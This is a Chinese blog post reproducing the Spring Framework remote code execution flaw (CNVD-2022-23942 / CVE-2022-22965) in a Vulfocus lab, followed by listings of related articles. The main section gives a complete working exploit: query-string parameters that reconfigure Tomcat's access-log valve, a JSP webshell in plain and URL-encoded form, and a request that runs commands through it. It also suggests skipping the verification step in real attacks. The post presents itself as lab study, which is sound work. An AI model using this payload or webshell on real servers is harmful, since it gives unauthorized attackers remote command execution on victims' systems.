vulfocus复现:Spring Framework 远程命令执行漏洞

最新推荐文章于 2025-03-25 10:54:25 发布
最新推荐文章于 2025-03-25 10:54:25 发布
阅读量1.4k 收藏 5
点赞数 1
分类专栏: 漏洞复现 文章标签: spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/woai_zhongguo/article/details/125846680
版权

CNVD-2022-23942

一、影响范围:

1.     jdk9+

2.    Spring Framework 5.3.X < 5.3.18

       Spring Framework 5.2.X < 5.2.20

二、原理:利⽤class对象构造利⽤链,对Tomcat的日志配置进行修改,然后,向⽇志中写⼊shell;完整利用链

class.module.classLoader.resources.context.parent.pipeline.first.pattern=
构建文件的内容
 
class.module.classLoader.resources.context.parent.pipeline.first.suffix=
修改tomcat日志文件后缀
 
class.module.classLoader.resources.context.parent.pipeline.first.directory=
写入文件所在的网站根目录
 
class.module.classLoader.resources.context.parent.pipeline.first.prefix=
写入文件名称
 
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
文件日期格式(实际构造为空值即可)

三、复现过程

开启靶场

访问靶场并抓包

构造payload    //此payload为了方便理解加了换行,使用中需要将“&”后的空格删除

?class.module.classLoader.resources.context.parent.pipeline.first.pattern=spring&
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&
class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shell&
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=


发送payload:
GET方式发送(可分五次请求,也可单次请求),出现ok说明执行成功


发送完payload后,访问访问http://123.58.224.8:15494/shell.jsp,界面出现spring说明写入成功;

下一步需要做的就是将内容更改为webshell,并让它解析就可以了
写入webshell到网站根目录

webshell代码

url编码前的webshell:
%{c}i if("d".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{e}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{f}i

url编码后的webshell:
%25%7Bc%7Di%20if(%22d%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Be%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bf%7Di


f:%>//
e:Runtime
c:<%

这里的webshell也是照葫芦画瓢借鉴的别人写的,不过在这位师傅视频的第17分钟左右讲解到对webshell的分析https://www.bilibili.com/video/BV19u411y7iA,路过的师傅有更好理解原理的可以留言在评论区~,我们一同学习~

返回ok表明webshell已经写入服务器,

访问并获取flag

http://123.58.224.8:15494/shell.jsp?pwd=d&cmd=ls%20/tmp

除此之外,还可以试着执行其他任意命令,如whoami

pingDNS

实战可省去验证步骤,直接写入webshell

 

总结:通过该漏洞可写入webshell造成命令执行。

如果可以帮助到你,劳烦点点赞哦!

声明: 本文章仅供学习使用,不得用于未授权的渗透测试,禁止用于非法用途。

Spring Framework 远程命令执行漏洞CVE-2022-22965
qq_32445755的博客
03-31 497
简介 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 Spring 0day漏洞 影响范围 JDK9 <= Spring Cloud Function JDK9及其以上版本; 使⽤了Spring-bean
Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
Blue的博客
06-22 2201
Spring Framework存在远程代码执行漏洞,在 JDK 9 及以上版本环境下,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行漏洞
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)
Aquarius_ego的博客
05-16 1897
Vulfocus复现Spring框架远程命令执行漏洞(CNVD-2022-23942)/spring-core-rce-2022-03-29
(CVE-2022-22965)Spring Framework 远程命令执行漏洞(vulfocus复现)
qq_40646572的博客
05-11 1018
漏洞SpringFramework数据绑定的一个漏洞,如果后台方法中接受的参数为非基础类型,Spring会根据前端传入的请求正文中的参数的key值来查询与其名称所对应的getter和setter方法,攻击者利用这一特性修改了Tomcat的一个用于日志记录的类的属性,进而当Tomcat在进行写日志操作的时候,将攻击者传递的恶意代码写入指定目录的指定文件中。
vulfocus漏洞学习——nostromo 远程命令执行 (CVE-2019-16278)
最新发布
2401_88083440的博客
03-25 404
也是成功把vulfocus镜像给整好了,而且竟然能成功拉取镜像!(我用的服务机是centos 7,以前都是kali 或 Ubuntu>-<)启动靶场环境,在此之前,先了解一些基础的东西(1)Nostromo 是一款开源的Web服务器,专为Unix/Linux系统设计,常用于嵌入式设备等(2)此漏洞的根源是:Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。
Spring Framework远程代码执行漏洞_CVE-2022-22965复现
beichenyyds的博客
04-07 4088
1. 漏洞介绍 Spring Framework是一个开源应用框架,初衷是为了降低应用程序开发的复杂度,具有分层体系结构,允许用户选择组件,同时还为 J2EE 应用程序开发提供了一个好用的框架。当Spring部署在JDK9及以上版本,远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JDK 9 及以上版本 Spring框架的5.3.0
Spring Framework远程代码执行漏洞(CVE-2022-22965)
热门推荐
chaojixiaojingang
04-06 1万+
1.漏洞描述 由于Spring处理流程存在缺陷,在JDK9及以上版本的Spring框架环境中,远程攻击者可在满足特定条件的基础上,通过框架的参数绑定功能获取AccessLogValve对象并注入恶意字段值,触发pipeline机制,从而在任意路径下写入文件。远程攻击者可利用该漏洞写入恶意代码导致远程代码执行。 2.影响版本 JDK >= 9 & 5.3.X < Spring Framework < 5.3.18 JDK >= 9 & 5.2.X ...
Spring Framework 远程代码执行漏洞复现(CVE-2022-22965)
Start C的博客
04-01 4963
1、概述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执行。 该漏洞广泛存在于Spring 框架以及衍生的框架中,并JDK 9.0及以上版本会受到影响。 2、受影响版本 Spring Core <= 5.2.19, <= 5.3.17 Spring Boot <= 2.6.5 3、利用前提 JD
记录一次vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
sszsNo1的博客
06-29 303
vulhub:Spring Framework远程代码执行漏洞复现(CVE-2022-22965)
spring framework远程代码执行漏洞复现(CNVD-2022-23942 CVE-2022-22965)
yang1234567898的博客
04-18 7270
3 月 30 日,国家信息安全漏洞共享平台(CNVD)接收到蚂蚁科技集团股份有限公司报送的 Spring 框架远程命令执行漏洞(CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。CNVD 对该漏洞的综合评级为“高危”。 漏洞影响: JDK9+ 使用了 Spring 框架或衍生框架 Apache Tomcat 作为 Servlet 容器 spring-webmvc 或 spring-webflux 依赖 Spring Framework 版本 5.3.0..
[2022.3.30安全漏洞]Spring Framework远程代码执行漏洞
DynmicResource的博客
04-01 3118
一起养成写作习惯!这是我参与「掘金日新计划 · 4 月更文挑战」的第1天,点击查看活动详情。 2022年3月30日,国家信息安全漏洞共享平台(CNVD)发布了Spring框架远程命令执行漏洞(CNVD-2022-23942)。攻击者利用该漏洞,可在未授权的情况下远程执行命令。 目前,此漏洞POC、技术细节及EXP已大范围公开,此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞...
Spring框架远程命令执行漏洞复现
xiaoMiao的博客
04-11 7249
Spring框架远程命令执行漏洞docker环境复现 记录篇~
Spring框架存在远程命令执行(CVE-2022-22965)漏洞
m0_74080781的博客
02-21 877
CE2022965是一个较老但当时非常流行的动作工具,功能丰富,基于框架。 2.该工具可以做很多事情,包括配合log进行高版本GDP过滤。 3.ce2022965的版本号有其特殊规则,副版本号不能超过9.999.0.66,主版本号必须大于1.8。漏洞利用条件1. 检测是否使用Spring框架,若未使用,则不存在该漏洞。2. 检查项目是否使⽤Spring参数绑定,若未使用,则不存在该漏洞。3. 检查中间件使用的JDK版本,若版本号小于9,则不存在该漏洞。利用jdk9+的新特性,也就是module机制...
Spring框架(Framework)存在远程命令执行漏洞
qq_20025777的博客
08-31 698
Spring框架存在远程命令执行漏洞
【安全通报】Spring Framework 远程命令执行漏洞(CVE-2022-22965)
Hanko的专栏
04-02 3944
原文: https://nosec.org/home/detail/4983.html 近日,Spring 官方 GitHub issue中提到了关于 Spring Core 的远程命令执行漏洞,该漏洞广泛存在于Spring 框架以及衍生的框架中。 漏洞描述 Spring core是Spring系列产品中用来负责发现、创建并处理bean之间的关系的一个工具包,是一个包含Spring框架基本的核心工具包,Spring其他组件都要使用到这个包。 未经身份验证的攻击者可以使用此漏洞进行远程任意代码执
Spring Framework远程代码执行漏洞
m0_71745903的博客
01-11 818
2022年3月30日,国家信息安全漏洞共享平台(CNVD)发布了Spring框架远程命令执行漏洞(攻击者利用该漏洞,可在未授权的情况下远程执行命令。目前,此漏洞POC、技术细节及EXP已大范围公开,此漏洞影响范围极大。目前Spring官方已发布补丁修复该漏洞,强烈建议Spring框架用户立即更新至最新版本。
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
weixin_45715461的博客
07-11 3885
CVE-2022-22965 Spring Framework远程代码执行漏洞 复现
安全修复之Web——Spring Framework 远程代码执行漏洞
CN華少的博客
05-21 451
安全修复之Web——Spring Framework 远程代码执行漏洞 背景 日常我们开发时,会遇到各种各样的奇奇怪怪的问题(踩坑o(╯□╰)o),这个常见问题系列就是我日常遇到的一些问题的记录文章系列,这里整理汇总后分享给大家,让其还在深坑中的小伙伴有绳索能爬出来。 同时在这里也欢迎大家把自己遇到的问题留言或私信给我,我看看其能否给大家解决。 开发环境 系统:windows10 语言:Java...
CVE-2022-22965——Spring Framework远程代码执行漏洞
c0rdXy的博客
09-25 258
Spring Framework远程代码执行漏洞
vulfocus漏洞复现
08-21
根据引用的描述,已复现Vulfocus靶场漏洞spring代码执行(CVE-2018-1273)。该漏洞是指当使用Spring Framework版本4.3.5之前的应用程序中使用了Expression Language(SpEL)的功能时,攻击者可以通过构造特定的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值